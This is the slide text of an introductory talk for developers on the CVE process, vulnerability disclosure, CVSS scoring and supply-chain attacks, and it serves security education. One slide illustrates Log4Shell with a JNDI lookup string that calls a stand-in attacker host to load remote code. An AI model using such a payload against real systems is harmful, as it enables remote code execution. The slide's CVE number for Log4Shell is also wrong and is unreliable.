Ever wonder about the mindset of a hacker? What is a Zero day attack? When does the clock start ticking? As cyber Attacks become an existential threat it’s critical that all software developers understand the role the CVE process plays in helping us keep our defenses strong - and where it can go wrong or be subverted. In this session, we’ll cover how the CVE process works, explore the timelines of a few famous CVEs, and uncover the truth about ethical reporting. We'll then discuss the practical steps you can take as a developer to write safer software. From bug bounties and bad actors to unsung developer heroes and incredible researchers, it’s time to buckle up for a wild ride as we show you what CVEs are all about.

1. A DEVELOPER'S GUIDE TO THE
WORLD OF APPLICATION SECURITY
CVE 101
Theresa Mammarella

2. THERESA MAMMARELLA
• Software Engineer @ IBM
• Eclipse OpenJ9 JVM
• Open source developer, community
member, and speaker
@t_mammarella
linkedin.com/in/tmammarella

4. INSIDER THREAT
The potential for an insider to use their authorized access or understand of an
organization to harm that organization
• When an engineer is compromised by outside influence or dissatisfaction
• When an engineer is poorly trained
• When engineers put backdoors into a product
• When remote development systems are not secured or when protections are
removed
• When accounts and credentials for terminated or inactive personnel remain
available.
Source: media.defense.gov/2022/Sep/01/2003068942/-1/-1/0/ESF_SECURING_THE_SOFTWARE_SUPPLY_CHAIN_DEVELOPERS.PDF

5. OUTNUMBERED SECURITY STAFF LEAVES
SOFTWARE VULNERABLE
AppSec Developers

6. Source: testbytes.net/blog/what-is-a-software-bug
ECONOMICS OF FIXING A SECURITY CONCERN
Time
Cost
of
fix

7. AGENDA
1 SECURITY BASICS
2 VULNERABILITY TRACKING
3 DISCLOSURE PROCESS
4 SECURITY PRACTICES FOR
DEVELOPERS

8. THE BASICS
Vulnerability
Threat
Risk

9. THE BASICS
Vulnerability
Threat
Risk
x

10. COMMON VULNERABILITIES AND
EXPOSURES (CVES)
Description
Year
ID
References

11. NATIONAL VULNERABILITY
DATABASE

12. CVSS SCORE
METRICS

13. SCORING CONTEXT
MATTERS
CVE-2023-36844
+
CVE-2023-36845
+
CVE-2023-36846
+
CVE-2023-36847
= CVSS 9.8
(Critical)

17. SO WHAT IS THE BEST
WAY TO TALK ABOUT
VULNERABILITIES?
• Private disclosure
• Coordinated (responsible) disclosure
• Full (Public) disclosure

18. ZERO DAY
VULNERABILITY
Security bug or flaw
which is either unknown
to the vendor does not
have an official patch.

20. The Zero Day Window is Closing
Source: Adapted from IBM X-Force / Analysis by Gartner Research (September 2016)
Year of Date Reported
2006 2007 2008 2009 2010 2011 2012 2013 2104 2015
10
20
30
40
50
0
Average
Days
from
Public
Disclosure
to
Exploit
Average
45
15
2017 2019 2021
Struts2

21. logger.info(“{}”, jndi:ldap://evil.badguys);
LOG4J
LOG4SHELL AND REMOTE
CODE EXECUTION
System Loader
JDNI Loader
http://badserver.com

22. CVE-2021-4428
(AKA LOG4SHELL)
• Coordinated disclosure
• Incomplete fix
• More CVE's follow

23. WHAT'S THE DIFFERENCE BETWEEN THESE LINES
OF CODE?

24. CVE-2022-3786 AND CVE-2022-3602

25. MOST OF THESE STORIES
ARE UNTOLD
Jeremy Long, founder of the
OWASP Dependency Check
project speculates that "only
25% of organizations report
vulnerabilities to users, and
only 10% of vulnerabilities are
reported as Common
Vulnerabilities exposure (CVE)."
Sonatype State of the Software Supply Chain Report 2019

26. Security Practices for
Developers

27. HOW DO I DISCLOSE A VULNERABILITY IN A
RESPONSIBLE WAY?
• Company Website
• Security files on servers
• SECURITY.md
• Github private vulnerability reporting

28. Credit: Eddie Knight, Sonatype
THE
MANTRA
01
Does this touch the internet?
If a feature touches the internet, we need to
ensure end-to-end security from the supplier
to the consumer
02
Does this take untrusted input?
If a feature takes untrusted input, we need to
validate it's integrity before use
03
Does this handle sensitive data?
If a feature handles sensitive data, we must pay
special care to encryption, handling, and storage.

31. SOFTWARE
DEPENDENCIES
Dependencies
Dev Tools
Applications

32. TYPES OF SUPPLY CHAIN ATTACKS
• Typosquatting
• Open source repo attacks
• Build tool attacks
• Dependency confusion
org.javazone
vs
org.javazonne
foo @ v1
foo @ v99999

33. LOOKING
THROUGH THE
NOISE
Other free tools:
https://owasp.org/www-community/Free_for_Open_Source_Application_Security_Tools

34. HOW FAST IS YOUR
RELEASE PROCESS?
Sonatype: State of the Software Supply Chain 2022

35. SECURITY
CHAMPION

36. RECAP
• Vulnerability x Threat = Risk
• CVE’s, CVSS, disclosure process
• The Mantra/OWASP Top 10
• Dependency management
• Release speed
• Security champion programs

38. THANK YOU
JAVAZONE!
• Linux Foundation free course
Developing Secure Software
https://training.linuxfoundation.org/training/devel
oping-secure-software-lfd121/
• OWASP Webgoat
Hands on with the OWASP Top 10
https://owasp.org/www-project-webgoat/
• Foojay security posts
https://foojay.io/today/category/security/
• OWASP’s list of Free for Open Source
Application Security Tools
https://owasp.org/www-
community/Free_for_Open_Source_Application_S
ecurity_Tools
@t_mammarella
linkedin.com/in/tmammarella
KEEP IN TOUCH: